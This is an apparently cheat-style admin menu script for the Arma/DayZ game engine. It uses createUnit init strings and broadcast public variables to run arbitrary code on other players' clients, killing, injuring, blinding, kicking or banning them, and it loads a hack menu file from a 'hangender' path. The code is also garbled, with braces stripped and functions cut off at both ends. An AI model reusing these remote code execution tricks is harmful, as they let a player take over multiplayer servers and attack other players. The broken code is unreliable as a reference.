    			hint "Inf Ammo Disabled";
    	adminCarGod =
    		if (isNil "adminCarGodToggle") then {adminCarGodToggle = 0;};
    		if (adminCarGodToggle == 0) then
    			adminCarGodToggle = 1;
    			hint "Car God Enabled";
    			while {adminCarGodToggle==1} do
    				if ((vehicle player) != player) then { (vehicle player) setDamage 0; (vehicle player) setFuel 1; };
    				sleep 0.1;
    			adminCarGodToggle = 0;
    			hint "Car God Disabled";
    	admininvis =
    		if (isNil 'inv1') then {inv1 = 0;};
    		if (inv1 == 0) then
    			tlmadminrq = [3, player, true];
    			publicVariable "tlmadminrq";
    			inv1 = 1;
    			hint "Invisibility Enabled";
    			tlmadminrq = [3, player, false];
    			publicVariable "tlmadminrq";
    			inv1 = 0;
    			hint "Invisibility Disabled";
    	admintele =
    			if (name _x == _this select 0) then
    				_bolt = vehicle player;
    				_hitObject = vehicle _x;
    				_val = [0,-1,0];
    				_hitMemoryPt = "";
    				_bolt attachTo [_hitObject,_val,_hitMemoryPt];
    				hint format ["Moving to %1", _this select 0];
    				sleep 1;
    				detach _bolt;
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminbreakleg =
    			if (name _x == _this select 0) then
    				tlmadminrq = [2,player,_x];
    				publicVariable "tlmadminrq";
    				hint format ["Breaking %1's legs", _this select 0];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminspec =
    			if (name _x == _this select 0) then
    				_x switchCamera "EXTERNAL";
    				hint format ["Spectating %1, press F10 to cancel", name _x];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminControl =
    			if (name _x == _this select 0) then
    				_x switchCamera "INTERNAL";
    				selectPlayer _x;
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminkill =
    			if (name _x == _this select 0) then
    				tlmadminrq = [4,player,_x];
    				publicVariable "tlmadminrq";
    				hint format ["Killing %1", _this select 0];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminSuicide =
    			if (name _x == _this select 0) then
    				tlmadminrq = [18,player,_x];
    				publicVariable "tlmadminrq";
    				hint format ["Suiciding %1", _this select 0];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminTargetVehBoost =
    			if (name _x == _this select 0) then
    				tlmadminrq = [11,player,_x];
    				publicVariable "tlmadminrq";
    				hint format ["Vehicle Boost @ %1", _this select 0];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	admint2me =
    			if (name _x == _this select 0) then
    				tlmadminrq = [7,player,_x];
    				publicVariable "tlmadminrq";
    				hint format ["Teleporting %1", _this select 0];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminweapon =
    		_item = _this select 0;
    		_config = [_item];
    		_isOK = [player,_config] call BIS_fnc_invAdd;
    		_mags = getArray(configfile >> 'cfgWeapons' >> _item >> 'magazines');
    		_config = _mags select 0;
    		_isOK = [player,_config] call BIS_fnc_invAdd;
    		_isOK = [player,_config] call BIS_fnc_invAdd;
    		_isOK = [player,_config] call BIS_fnc_invAdd;
    		player selectWeapon _item;
    		reload player;
    	adminsveh =
    		tlmadminrq = [0, player, _this select 0, [((getPos player) select 0) + 3, ((getPos player) select 1) + 3, 0]];
    		publicVariable "tlmadminrq";
    	adminsobj =
    		tlmadminrq = [0, player, _this select 0, [((getPos player) select 0) + 3, ((getPos player) select 1) + 3, 0]];
    		publicVariable "tlmadminrq";
    	adminUncon =
    			if (name _x == _this select 0) then
    				tlmadminrq = [8,player,_x];
    				publicVariable "tlmadminrq";
    				hint format ["Putting %1 to sleep...", _this select 0];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminSlap =
    			if (name _x == _this select 0) then
    				tlmadminrq = [12,player,_x];
    				publicVariable "tlmadminrq";
    				hint format ["Slapping %1...", _this select 0];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminDrug =
    			if (name _x == _this select 0) then
    				tlmadminrq = [13,player,_x];
    				publicVariable "tlmadminrq";
    				hint format ["Drugging %1...", _this select 0];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminBan =
    			if (name _x == _this select 0) then
    				tlmadminrq = [15,player,_x];
    				publicVariable "tlmadminrq";
    				hint format ["Banned %1...", _this select 0];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminKick =
    			if (name _x == _this select 0) then
    				tlmadminrq = [14,player,_x];
    				publicVariable "tlmadminrq";
    				hint format ["Kicked %1...", _this select 0];
    		} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	adminClearBan =
    		tlmadminrq = [16,player];
    		publicVariable "tlmadminrq";
    		hint "Bans cleared!";
    	adminGiveGod =
    		if ((_this select 1) == 1) then {
    				if (name _x == _this select 0) then
    					tlmadminrq = [9,player,_x];
    					publicVariable "tlmadminrq";
    					hint format ["Giving %1 GodMode...", _this select 0];
    			} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    				if (name _x == _this select 0) then
    					tlmadminrq = [10,player,_x];
    					publicVariable "tlmadminrq";
    					hint format ["Taking %1's GodMode...", _this select 0];
    			} forEach ([6800, 9200, 0] nearEntities [["AllVehicles"], 110000000]);
    	(findDisplay 46) displayAddEventHandler ["KeyUp","
    	if (_this select 1 == 0x3B) then {call admin_init;};
    	if (_this select 1 == 0x44) then {player switchCamera 'EXTERNAL';};"];
    	(findDisplay 46) displayAddEventHandler ["KeyUp", "if ((_this select 1) == 0xD3) then {call compile preprocessFileLineNumbers ""\hangender\start.sqf"";};"];
    	(findDisplay 46) displayAddEventHandler ["KeyUp", "if ((_this select 1) == 0x43) then {deleteVehicle cursorTarget;};"];
    	((findDisplay 12) displayCtrl 51) ctrlAddEventHandler ["MouseButtonUp", "if ((_this select 1) == 0) then
    		if (tpEnabled) then
    			tlmadminrq = [1, player, (_this select 0) posScreenToWorld [_this select 2, _this select 3]];
    			publicVariable 'tlmadminrq';
    call compile (" 
    ""tlmadminrq"" addPublicVariableEventHandler { _player = (_this select 1) select 1;
    	if (getPlayerUID _player in "+(str _list)+") then {_this call tlmadminrq_helper;} 
    	else {
    tlmadminrq_helper =
    	_array = _this select 1;
    	_option = _array select 0;
    	if (_option == 0) then
    		_object = (_array select 2) createVehicle (_array select 3);
    		//dayz_serverObjectMonitor set [count dayz_serverObjectMonitor, _object];
    		//_object setVariable ["ObjectID", "1", true];
    		//_object setVariable ["ObjectUID", "1", true];
    	if (_option == 1) then
    		vehicle (_array select 1) setPosATL (_array select 2);
    	if (_option == 2) then
    		_do = format ["if (getPlayerUID player == '%1') then
    			_unit = player;
    			_selection = ""legs"";
    			_damage = 1;
    			_unit setHit[_selection,_damage];
    		};", getPlayerUID (_array select 2)];
    		//_list = [0,0,0] nearEntities 1000000000000000; (_list select 0) setVehicleInit _do; processInitCommands; clearVehicleInit (_list select 0);
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 3) then
    		if (_array select 2) then
    			doinv = format ["
    				if (getPlayerUID _x == '%1') then
    					_x hideObject true;
    			} forEach ([6800, 9200, 0] nearEntities [['AllVehicles'], 110000000]);", getPlayerUID (_array select 1)];
    			doinv = format ["
    				if (getPlayerUID _x == '%1') then
    					_x hideObject false;
    			} forEach ([6800, 9200, 0] nearEntities [['AllVehicles'], 110000000]);", getPlayerUID (_array select 1)];
    		//_list = [0,0,0] nearEntities 1000000000000000; (_list select 0) setVehicleInit doinv; processInitCommands; clearVehicleInit (_list select 0);
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, doinv + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 4) then
    		vehicle (_array select 2) setDamage 1;
    	if (_option == 5) then
    		_unit = _array select 2;
    		_unit setVariable ["USEC_lowBlood",false,true];
    		PVDZ_hlt_Morphine = [_unit,player];
    		//publicVariable "PVDZ_hlt_Morphine";
    		_unit setVariable["medForceUpdate",true];
    		PVDZ_hlt_Bandage = [_unit];
    		//publicVariable "PVDZ_hlt_Bandage";
    		{_unit setVariable[_x,false,true];} foreach USEC_woundHit;
    		_unit setVariable ["USEC_injured",false,true];
    		_unit setVariable ["USEC_lowBlood",false,true];
    		PVDZ_hlt_Transfuse = [_unit];
    		//publicVariable "PVDZ_hlt_Transfuse";
    		_unit setVariable ["NORRN_unconscious", false, true];
    		_unit setVariable ["USEC_iscardiac",false,true];
    		PVDZ_hlt_PainK = [_unit,player];
    		//publicVariable "PVDZ_hlt_PainK";
    		_unit setVariable ["medForceUpdate",true];
    		_unit setdamage 0;
    		_do = format ["if (getPlayerUID player == '%1') then
    			r_fracture_legs = false;
    			r_fracture_arms = false;
    			dayz_sourceBleeding = objNull;
    			r_player_blood = r_player_bloodTotal;
    			r_player_inpain = false;
    			r_player_infected = false;
    			r_player_injured = false;
    			dayz_hunger = 0;
    			dayz_thirst = 0;
    			dayz_temperatur = 40;
    			r_fracture_legs = false;
    			r_fracture_arms = false;
    			r_player_dead = false;
    			r_player_unconscious = false;
    			r_player_loaded = false;
    			r_player_cardiac = false;
    			r_player_lowblood = false;
    			r_player_timeout = 0;
    			r_handlercount = 0;
    			_display = uiNamespace getVariable 'DAYZ_GUI_display';
    			_control = _display displayCtrl 1203;
    			_control ctrlShow false;
    			r_player_handler = false;
    			disableUserInput false;
    			""dynamicBlur"" ppEffectAdjust [0]; ""dynamicBlur"" ppEffectCommit 5;
    			_unit = player;
    			_selection = ""legs"";
    			_damage = 0;
    			_unit setHit[_selection,_damage];
    		};", getPlayerUID (_array select 2)];
    		//_list = [0,0,0] nearEntities 1000000000000000; (_list select 0) setVehicleInit _do; processInitCommands; clearVehicleInit (_list select 0);
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 6) then
    		_pos = getPos (_array select 1);
    		_crate = "Box_NATO_Wps_F" createVehicle _pos;
    		clearMagazineCargo _crate;
    		clearWeaponCargo _crate;
    		clearItemCargoGlobal _crate;
    		///NATO Weapons///
    		_crate addWeaponCargoGlobal ["arifle_MX_F", 50];
    		_crate addWeaponCargoGlobal ["arifle_MX_GL_F", 50];
    		_crate addWeaponCargoGlobal ["arifle_MXC_F", 50];
    		_crate addWeaponCargoGlobal ["arifle_TRG20_F", 50];
    		_crate addWeaponCargoGlobal ["arifle_TRG21_F", 50];
    		_crate addWeaponCargoGlobal ["arifle_TRG21_GL_F", 50];
    		//_crate addWeaponCargoGlobal ["arifle_MSM_F", 50];
    		_crate addWeaponCargoGlobal ["srifle_EBR_F", 50];
    		_crate addWeaponCargoGlobal ["LMG_Mk200_F", 50];
    		///OPFOR Weapons////
    		_crate addWeaponCargoGlobal ["arifle_Khaybar_F", 50];
    		_crate addWeaponCargoGlobal ["arifle_Khaybar_C_F", 50];
    		_crate addWeaponCargoGlobal ["arifle_Khaybar_GL_F", 50];
    		_crate addWeaponCargoGlobal ["hgun_rook40_F", 50];
    		_crate addMagazineCargoGlobal ["30Rnd_65x39_Caseless_mag", 200];
    		_crate addMagazineCargoGlobal ["100Rnd_65x39_Caseless_mag", 200];
    		_crate addMagazineCargoGlobal ["30Rnd_65x39_caseless_mag_Tracer", 200];
    		_crate addMagazineCargoGlobal ["100Rnd_65x39_caseless_mag_Tracer", 200];
    		//_crate addMagazineCargoGlobal ["30Rnd_65x39_caseless_mag_green", 200];
    		_crate addMagazineCargoGlobal ["30Rnd_65x39_case_mag", 200];
    		_crate addMagazineCargoGlobal ["20Rnd_762x45_Mag", 200];
    		_crate addMagazineCargoGlobal ["16Rnd_9x21_Mag", 200];
    		_crate addMagazineCargoGlobal ["30Rnd_9x21_Mag", 200];
    		_crate addMagazineCargoGlobal ["20Rnd_556x45_UW_Mag", 200];
    		_crate addMagazineCargoGlobal ["30RND_556x45_Stanag", 200];
    		_crate addMagazineCargoGlobal ["200RND_65x39_Cased_box_Tracer", 200];
    		_crate addWeaponCargoGlobal ["launch_NLAW_F", 50];
    		_crate addWeaponCargoGlobal ["launch_RPG32_F", 50];
    		////Launcher Ammo////
    		_crate addMagazineCargoGlobal ["RPG32_F", 50];
    		_crate addMagazineCargoGlobal ["NLAW_F", 50];
    		_crate addMagazineCargoGlobal ["ATMine_Range_Mag", 50];
    		_crate addMagazineCargoGlobal ["APERSMine_Range_Mag", 50];
    		_crate addMagazineCargoGlobal ["ClaymoreDirectionalMine_Remote_Mag", 50];
    		_crate addMagazineCargoGlobal ["DemoCharge_Remote_Mag", 50];
    		_crate addMagazineCargoGlobal ["APERSBoundingMine_Range_Mag", 50];
    		_crate addMagazineCargoGlobal ["SLAMDirectionalMine_Wire_Mag", 50];
    		_crate addMagazineCargoGlobal ["APERSTripMine_Wire_Mag", 50];
    		_crate addWeaponCargoGlobal ["ToolKit", 50];
    		_crate addWeaponCargoGlobal ["MineDetector", 50];
    		_crate addWeaponCargoGlobal ["Medikit", 50];
    		_crate addMagazineCargoGlobal ["1Rnd_HE_Grenade_shell", 50];
    		_crate addMagazineCargoGlobal ["1Rnd_Smoke_Grenade_shell", 50];
    		_crate addMagazineCargoGlobal ["1Rnd_SmokeGreen_Grenade_shell", 50];
    		_crate addMagazineCargoGlobal ["1Rnd_SmokeYellow_Grenade_shell", 50];
    		_crate addMagazineCargoGlobal ["1Rnd_SmokePurple_Grenade_shell", 50];
    		_crate addMagazineCargoGlobal ["1Rnd_SmokeBlue_Grenade_shell", 50];
    		_crate addMagazineCargoGlobal ["1Rnd_SmokeOrange_Grenade_shell", 50];
    		_crate addMagazineCargoGlobal ["SmokeShellRed", 50];
    		_crate addMagazineCargoGlobal ["SmokeShell", 50];
    		_crate addMagazineCargoGlobal ["SmokeShellGreen", 50];
    		_crate addMagazineCargoGlobal ["SmokeShellYellow", 50];
    		_crate addMagazineCargoGlobal ["SmokeShellPurple", 50];
    		_crate addMagazineCargoGlobal ["SmokeShellBlue", 50];
    		_crate addMagazineCargoGlobal ["SmokeShellOrange", 50];
    		_crate addItemCargoGlobal ["Zasleh2",50]; 
    		_crate addItemCargoGlobal ["muzzle_snds_H", 50]; 
    		_crate addItemCargoGlobal ["muzzle_snds_L", 50]; 
    		_crate addItemCargoGlobal ["muzzle_snds_B", 50]; 
    		_crate addItemCargoGlobal ["muzzle_snds_H_MG", 50]; 
    		_crate addItemCargoGlobal ["optic_Arco", 50]; 
    		_crate addItemCargoGlobal ["optic_Hamr", 50]; 
    		_crate addItemCargoGlobal ["optic_Aco", 50]; 
    		_crate addItemCargoGlobal ["optic_ACO_grn",50]; 
    		_crate addItemCargoGlobal ["optic_Holosight", 50]; 
    		_crate addItemCargoGlobal ["acc_flashlight", 50]; 
    		_crate addItemCargoGlobal ["acc_pointer_IR", 50];
    		_crate addItemCargoGlobal ["FirstAidKit", 50];
    		_crate addItemCargoGlobal ["Toolkit", 50];
    		_crate addItemCargoGlobal ["U_BasicBody", 50];
    		_crate addItemCargoGlobal ["U_B_CombatUniform_mcam", 50];
    		_crate addItemCargoGlobal ["U_B_CombatUniform_mcam_tshirt", 50];
    		_crate addItemCargoGlobal ["U_B_CombatUniform_mcam_vest", 50];
    		_crate addItemCargoGlobal ["U_B_HeliPilotCoveralls", 50];
    		_crate addItemCargoGlobal ["U_B_Wetsuit", 50];
    		_crate addItemCargoGlobal ["U_OI_CombatUniform_ocamo", 50];
    		_crate addItemCargoGlobal ["U_OI_PilotCoveralls", 50];
    		_crate addItemCargoGlobal ["U_OI_Wetsuit", 50];
    		_crate addItemCargoGlobal ["U_C_Poloshirt_blue", 50];
    		_crate addItemCargoGlobal ["U_C_Poloshirt_burgundy", 50];
    		_crate addItemCargoGlobal ["U_C_Poloshirt_stripped", 50];
    		_crate addItemCargoGlobal ["U_C_Poloshirt_tricolour", 50];
    		_crate addItemCargoGlobal ["U_C_Poloshirt_salmon", 50];
    		_crate addItemCargoGlobal ["U_C_Poloshirt_redwhite", 50];
    		_crate addItemCargoGlobal ["U_C_Commoner1_1", 50];
    		_crate addItemCargoGlobal ["U_C_Commoner1_2", 50];
    		_crate addItemCargoGlobal ["U_C_Commoner1_3", 50];
    		_crate addItemCargoGlobal ["U_Rangemaster", 50];
    		_crate addItemCargoGlobal ["V_Rangemaster_belt", 50];
    		_crate addItemCargoGlobal ["V_BandollierB_khk", 50];
    		_crate addItemCargoGlobal ["V_BandollierB_rgr", 50];
    		_crate addItemCargoGlobal ["V_BandollierB_cbr", 50];
    		_crate addItemCargoGlobal ["V_PlateCarrier1_rgr", 50];
    		_crate addItemCargoGlobal ["V_PlateCarrier1_cbr", 50];
    		_crate addItemCargoGlobal ["V_PlateCarrier2_rgr", 50];
    		_crate addItemCargoGlobal ["V_PlateCarrierGL_rgr", 50];
    		_crate addItemCargoGlobal ["V_Chestrig_khk", 50];
    		_crate addItemCargoGlobal ["V_ChestrigB_rgr", 50];
    		_crate addItemCargoGlobal ["V_TacVest_khk", 50];
    		_crate addItemCargoGlobal ["V_TacVest_brn", 50];
    		_crate addItemCargoGlobal ["V_TacVest_oli", 50];
    		_crate addItemCargoGlobal ["V_HarnessO_brn", 50];
    		_crate addItemCargoGlobal ["V_HarnessOGL_brn", 50];
    		_crate addItemCargoGlobal ["V_RebreatherB", 50];
    		_crate addItemCargoGlobal ["V_RebreatherIR", 50];
    		_crate addItemCargoGlobal ["H_HelmetB", 50];
    		_crate addItemCargoGlobal ["H_Booniehat_khk", 50];
    		_crate addItemCargoGlobal ["H_Booniehat_mcamo", 50];
    		_crate addItemCargoGlobal ["H_Booniehat_ocamo", 50];
    		_crate addItemCargoGlobal ["H_HelmetB_paint", 50];
    		_crate addItemCargoGlobal ["H_HelmetB_light", 50];
    		_crate addItemCargoGlobal ["H_Cap_red", 50];
    		_crate addItemCargoGlobal ["H_Cap_brn_SERO", 50];
    		_crate addItemCargoGlobal ["H_Cap_blu", 50];
    		_crate addItemCargoGlobal ["H_Cap_headphones", 50];
    		_crate addItemCargoGlobal ["H_PilotHelmetHeli_B", 50];
    		_crate addItemCargoGlobal ["H_PilotHelmetHeli_O", 50];
    		_crate addItemCargoGlobal ["H_HelmetO_ocamo", 50];
    		_crate addItemCargoGlobal ["H_MilCap_ocamo", 50];
    		_crate addItemCargoGlobal ["H_MilCap_mcamo", 50];
    	if (_option == 7) then
    		_do = format ["if !(isServer) then
    			if (getPlayerUID player == '%1') then
    				player setpos %2;
    		};", getPlayerUID (_array select 2), str (getPosATL (_array select 1))];
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 8) then
    		_unit = _array select 2;
    		_code = { if !(local _this) exitWith {}; [player, 999] spawn {
    			_unit = _this select 0;
    			_damage = _this select 1;
    			_inVehicle = (vehicle _unit != _unit);
    			if (_unit == player) then {
    				r_player_timeout = 999;
    				if (_type == 1) then {r_player_timeout = r_player_timeout + 90};
    				if (_type == 2) then {r_player_timeout = r_player_timeout + 60};
    				r_player_unconscious = true;
    				player setVariable["medForceUpdate",true,true];
    				player setVariable ["unconsciousTime", r_player_timeout, true];
    			if (_inVehicle) then {
    				_unit spawn {
    					_veh = vehicle _this;
    					_unit = _this;
    					waitUntil{(((position _veh select 2 < 1) and (speed _veh < 1)) or (!r_player_unconscious))};
    					if (r_player_unconscious) then {
    						_unit action ["eject", _veh];
    						waitUntil{((vehicle _this) != _this)};
    						sleep 1;
    						_unit setVariable ["NORRN_unconscious", true, true];
    						_unit playActionNow "Die";
    			} else {
    				_unit setVariable ["NORRN_unconscious", true, true];
    				_unit playActionNow "Die";
    		PVAH_args = _unit;
    		PVAH_code = _code;
    		publicVariable "PVAH_args";
    		publicVariable "PVAH_code";
    		_do = ";PVAH_args spawn PVAH_code;";
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 9) then
    		_unit = _array select 2;
    		_code = { if !(local _this) exitWith {}; _object = player;
    			player setUnitRecoilCoefficient 0;
    			player_zombieCheck = {};
    			fnc_usec_damageHandler = {};
    			fnc_usec_unconscious  = {};
    			_object allowDamage false;
    			hint "God Enabled";};
    		PVAH_args = _unit;
    		PVAH_code = _code;
    		publicVariable "PVAH_args";
    		publicVariable "PVAH_code";
    		_do = ";PVAH_args spawn PVAH_code;";
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 10) then
    		_unit = _array select 2;
    		_code = { if !(local _this) exitWith {}; player setUnitRecoilCoefficient 1;
    			player_zombieCheck = compile preprocessFileLineNumbers "\z\addons\dayz_code\compile\player_zombieCheck.sqf";
    			fnc_usec_damageHandler = compile preprocessFileLineNumbers "\z\addons\dayz_code\compile\fn_damageHandler.sqf";
    			fnc_usec_unconscious = compile preprocessFileLineNumbers "\z\addons\dayz_code\compile\fn_unconscious.sqf";
    			player allowDamage true;
    			hint "God Disabled";};
    		PVAH_args = _unit;
    		PVAH_code = _code;
    		publicVariable "PVAH_args";
    		publicVariable "PVAH_code";
    		_do = ";PVAH_args spawn PVAH_code;";
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 11) then
    		_unit = _array select 2;
    		_code = { if !(local _this) exitWith {}; 
    			hint "Speed upgrade loaded!";
    			waituntil {!isnull (finddisplay 46)};
    			MY_KEYDOWN_FNC_xx1 = {
    				_vcl = vehicle player;
    				if(_vcl == player)exitwith{};
    				_nos = _vcl getvariable "nitro";
    				_supgrade = _vcl getvariable "supgrade";
    				if(isEngineOn _vcl) then
    					switch (_this) do {
    						case 17: {
    							if(isEngineOn _vcl and !isnil "_supgrade") then
    								_vcl SetVelocity [(velocity _vcl select 0) * 1.011, (velocity _vcl select 1) *1.011, (velocity _vcl select 2) * 0.99];
    							} else {
    								_vcl setvariable ["supgrade", 1];
    						case 42: {
    							if(isEngineOn _vcl and !isnil "_nos") then
    								_vcl setVelocity [(velocity _vcl select 0) * 1.01, (velocity _vcl select 1) * 1.01, (velocity _vcl select 2) * 0.99];
    							} else {
    								_vcl setvariable ["nitro", 1];
    			while {true} do 
    				adminvehicleSpeedy = (findDisplay 46) displayAddEventHandler ["KeyDown","_this select 1 call MY_KEYDOWN_FNC_xx1;false;"];
    				sleep 1;
    				(findDisplay 46) displayRemoveEventHandler ["KeyDown",adminvehicleSpeedy];
    		PVAH_args = _unit;
    		PVAH_code = _code;
    		publicVariable "PVAH_args";
    		publicVariable "PVAH_code";
    		_do = ";PVAH_args spawn PVAH_code;";
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 12) then
    		_unit = _array select 2;
    		_code = { if !(local _this) exitWith {}; _randomNess = [1,-1] call BIS_fnc_selectRandom;
    		(vehicle player) SetVelocity [_randomNess * random(10)* cos getdir (vehicle player), _randomNess * random(10)* cos getdir (vehicle player), random(5)];
    		hint "watatatatata slap";};
    		PVAH_args = _unit;
    		PVAH_code = _code;
    		publicVariable "PVAH_args";
    		publicVariable "PVAH_code";
    		_do = ";PVAH_args spawn PVAH_code;";
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 13) then
    		_unit = _array select 2;
    		_code = { if !(local _this) exitWith {}; 
    			while {true} do {
    				hint "You took drugs YOLOLOLO";
    			   nonapsi_ef = ppEffectCreate ["colorCorrections", 1555]; 
    			   nonapsi_ef ppEffectEnable true;
    			   nonapsi_ef ppEffectAdjust [1.0, 1.0, -0.03, [0.0, 0.0, 0.0, 0.0], [3.0, 5.0, 9.0, 5.0],[0.4,0.0,0.0, 0.7]];
    			   nonapsi_ef ppEffectCommit 1;
    			   sleep random(1);
    			   wetdist1 = ppEffectCreate ["wetDistortion", 2006];
    				wetdist1 ppEffectAdjust [0, 8, 0.8,8,8, 0.2, 1, 0, 0, 0.08, 0.08, 0, 0, 0, 0.77];
    				wetdist1 ppEffectEnable true;
    				wetdist1 ppEffectCommit 0;
    				ppe = ppEffectCreate ["colorCorrections", 1555]; 
    				ppe ppEffectAdjust [1, 1, 0, [1.5,6,2.5,0.5], [5,3.5,5,-0.5], [-3,5,-5,-0.5]]; 
    				ppe ppEffectCommit 1;
    				ppe ppEffectEnable true; 
    				ppe2 = ppEffectCreate ["chromAberration", 1555]; 
    				ppe2 ppEffectAdjust [0.01,0.01,true];
    				ppe2 ppEffectCommit 1;
    				ppe2 ppEffectEnable true;
    				ppe3 = ppEffectCreate ["radialBlur", 1555]; 
    				ppe3 ppEffectEnable true;
    				ppe3 ppEffectAdjust [0.02,0.02,0.15,0.15]; 
    				ppe3 ppEffectCommit 1;
    				sleep random(1);
    				wetdist1 = ppEffectCreate ["wetDistortion", 2006];
    				wetdist1 ppEffectAdjust [1, 1.16, 0.32, 2.56, 0.8, 0.64, 2.64, 0, 0, 1.08, 0.08, 0, 0, 0, 1.77];
    				wetdist1 ppEffectEnable true;
    				wetdist1 ppEffectCommit 0;
    				sleep random(1);
    			   nonapsi_ef = ppEffectCreate ["colorCorrections", 1555]; 
    			   nonapsi_ef ppEffectEnable true;
    			   nonapsi_ef ppEffectAdjust [1.0, 1.0, -0.02, [9.5, 1.5, 2.5, 0.2], [2.0, 7.0, 6.0, 2.0],[0.4,0.0,0.0, 0.7]];
    			   nonapsi_ef ppEffectCommit 1;
    			   sleep random(1);
    		PVAH_args = _unit;
    		PVAH_code = _code;
    		publicVariable "PVAH_args";
    		publicVariable "PVAH_code";
    		_do = ";PVAH_args spawn PVAH_code;";
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 14) then //kick
    		_unit = _array select 2;
    		_code = { if !(local _this) exitWith {}; hiveupdateresu = 1; publicVariable "hiveupdateresu"; 
    		"Goat_random_F" createUnit [[0,0,0], createGroup EAST,";call compile ""[] spawn {};"";", 0.6, "corporal"]; 
    		for "_i" from 0 to 99 do {(findDisplay _i) closeDisplay 0;}; endMission "END1"; };
    		PVAH_args = _unit;
    		PVAH_code = _code;
    		publicVariable "PVAH_args";
    		publicVariable "PVAH_code";
    		_do = ";PVAH_args spawn PVAH_code;";
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 15) then //ban
    		_unit = _array select 2;
    		_BanList = 	profileNamespace getVariable ["AHBanList",[]];
    		_BanList set [count _BanList, getPlayerUID _unit];
    		profileNamespace setVariable ["AHBanList", _BanList]; saveProfileNamespace;
    		_code = { if !(local _this) exitWith {}; hiveupdateresu = 1; publicVariable "hiveupdateresu"; 
    		"Goat_random_F" createUnit [[0,0,0], createGroup EAST,";call compile ""[] spawn {};"";", 0.6, "corporal"]; 
    		for "_i" from 0 to 99 do {(findDisplay _i) closeDisplay 0;}; endMission "END1"; };
    		PVAH_args = _unit;
    		PVAH_code = _code;
    		publicVariable "PVAH_args";
    		publicVariable "PVAH_code";
    		_do = ";PVAH_args spawn PVAH_code;";
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 16) then //clear ban
    		_unit = _array select 1;
    		profileNamespace setVariable ["AHBanList", []]; saveProfileNamespace;
    	if (_option == 17) then //WeatherLord
    		_selection = _array select 2;
    		_intensity = _array select 3;
    		_PVAH_RE = {
    			PVAH_args = _this select 3;
    			PVAH_code = _this select 4;
    			publicVariable "PVAH_args";
    			publicVariable "PVAH_code";
    			_do = ";PVAH_args spawn PVAH_code;";
    			_group = (creategroup east);
    			'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    			deleteVehicle adminREObj;
    			deleteGroup _group;
    		switch (_selection) do {
    			case 1:
    				[nil, nil, rSPAWN, _intensity, { "drn_DynamicWeatherEventArgs" addPublicVariableEventHandler {}; setViewDistance _this; }] call _PVAH_RE;
    			case 2:
    				[nil, nil, rSPAWN, _intensity, { "drn_DynamicWeatherEventArgs" addPublicVariableEventHandler {}; 0 setOvercast _this; forceWeatherChange;}] call _PVAH_RE;
    			case 3:
    				[nil, nil, rSPAWN, _intensity, { "drn_DynamicWeatherEventArgs" addPublicVariableEventHandler {}; 5 setRain _this; forceWeatherChange;}] call _PVAH_RE;
    	if (_option == 18) then //suicide
    		_unit = _array select 2;
    		_PVAH_RE = {
    			PVAH_args = _this select 3;
    			PVAH_code = _this select 4;
    			publicVariable "PVAH_args";
    			publicVariable "PVAH_code";
    			_do = ";PVAH_args spawn PVAH_code;";
    			_group = (creategroup east);
    			'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
